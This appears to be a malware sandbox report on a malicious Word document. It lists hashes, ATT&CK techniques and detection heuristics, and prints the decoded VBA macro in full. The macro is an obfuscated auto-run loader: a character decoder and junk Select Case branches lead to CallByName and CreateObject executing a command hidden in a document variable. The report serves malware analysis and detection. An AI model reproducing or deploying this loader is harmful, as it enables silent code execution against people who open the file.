Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bfd1b9c829f8a7c…

MALICIOUS

Office (OLE)

34.5 KB Created: 2018-10-18 23:18:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 3e43dcbbc8f1189b45e1cadc1d6bf668 SHA-1: e397cf4f8d4b263db40a0355e974c9bcb4acde92 SHA-256: 6bfd1b9c829f8a7cc70e598b9dc3133b2e7be0a4d518b26d4d40cb326eb7b2bb
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros, including a Document_Open auto-execution loader. These macros utilize CreateObject and CallByName, indicative of attempts to execute arbitrary code. The ClamAV detection 'Doc.Malware.Valyria-6749505-0' further supports the malicious nature of the file, suggesting it's a downloader for a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6749505-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2636 bytes
SHA-256: c1a8eaf8f7e5fcc5ad3e9bb699b1250cd9b1d8b8cf5876e33b748202843bb3a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function C_(ByVal OK_ As String)
Dim WPX_ As String: Dim JD_ As Long: For JD_ = 1 To Len(OK_) Step 2: WPX_ = WPX_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(OK_, JD_, 2)) - 15): Next: C_ = WPX_
End Function
Sub Document_Open()
Dim YXYG_ As Long: YXYG_ = 15
Dim YRPCYPII_ As Long
Select Case YXYG_
Case 33 - (65 + 15) - 62 * Round(50 / 27 - 11) * 99 * Round(83 / 17 - 50) * 99
YRPCYPII_ = 2827 / 35
Case 85 - (68 + 41) - 45 + (75 - 88) + 51 * Round(79 / 19 - 66) * 58
YRPCYPII_ = 783 + 36
Case 77 - (10 + 16) - 80 / Round(85 * 84 / 98) / 28 * Round(67 / 93 - 18) * 33
YRPCYPII_ = 1234 - 19
Case 82 - (40 + 41) - 87 * Round(16 / 94 - 98) * 29 + (40 - 38) + 46
YRPCYPII_ = 8768 + 66
Case 34 - (99 + 64) - 69 / Round(24 * 60 / 66) / 34 * Round(79 / 48 - 84) * 93
YRPCYPII_ = 1482 / 34
Case 46 * Round(78 / 94 - 85) * 32 + (79 - 16) + 12
YRPCYPII_ = 8122 - 31
Case 87 / Round(46 * 63 / 50) / 62 * Round(98 / 13 - 11) * 76
YRPCYPII_ = 7727 + 66
Case 17 / Round(88 * 18 / 92) / 29 * Round(59 / 69 - 70) * 59
YRPCYPII_ = 6270 - 36
Case 55 / Round(49 * 20 / 19) / 44 + (38 - 40) + 37
YRPCYPII_ = 297 - 83
Case 40 / Round(12 * 86 / 25) / 14 + (97 - 88) + 47 - (38 + 24) - 16
YRPCYPII_ = 4338 + 67
Case 80 + (73 - 91) + 27 - (66 + 29) - 75
YRPCYPII_ = 3038 - 37
Case 69 / Round(54 * 17 / 22) / 55 * Round(97 / 10 - 21) * 23 / Round(61 * 65 / 61) / 26
YRPCYPII_ = 7346 + 34
Case 77 - (68 + 72) - 45 / Round(86 * 43 / 83) / 53
YRPCYPII_ = 1398 * 67
Case 83 / Round(25 * 14 / 22) / 17 + (60 - 76) + 31 / Round(56 * 72 / 90) / 76
YRPCYPII_ = 7461 / 76
Case 96 - (80 + 74) - 54 - (91 + 59) - 57 + (40 - 70) + 72
YRPCYPII_ = 2277 - 57
Case 33 + (50 - 36) + 80 - (36 + 85) - 18
YRPCYPII_ = 8205 / 14
Case 42 * Round(15 / 17 - 85) * 71 / Round(52 * 41 / 28) / 13 * Round(49 / 27 - 43) * 71
YRPCYPII_ = 2213 - 47
Case 53 * Round(74 / 47 - 90) * 22 * Round(92 / 28 - 88) * 71
YRPCYPII_ = 6829 - 96
Case 56 - (43 + 41) - 55 * Round(89 / 55 - 34) * 62 + (95 - 10) + 62
YRPCYPII_ = 2107 / 86
Case 39 * Round(20 / 61 - 71) * 77 * Round(32 / 55 - 52) * 82 - (18 + 73) - 17
YRPCYPII_ = 7014 + 67
Case Else: CallByName CreateObject(C_("66627281787F833D6277747B7B")), C_("61847D"), VbMethod, C_(ActiveDocument.Variables("JUJIGI").Value), 0, True
End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.